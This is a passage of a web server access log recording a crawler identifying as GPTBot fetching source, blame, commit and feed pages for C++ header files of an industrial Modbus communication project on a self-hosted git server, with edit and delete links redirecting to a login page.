+[17/Feb/2026:18:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13060] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12966] [Gzip 4.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12263] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11810] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13563] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10317] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:18:58:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10145] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9890] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10788] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 13137] [Gzip 6.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10148] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 1600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 1025] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:58:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 1602] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11583] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:18:58:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11789] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:18:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10339] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9894] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10142] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12983] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9889] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13355] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:58:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10139] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 2066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13998] [Gzip 6.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:58:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11316] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=rendered" [Client 74.7.227.38] [Length 11268] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12257] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:18:58:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1007] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:18:58:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1590] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:18:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11574] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:59:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:59:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 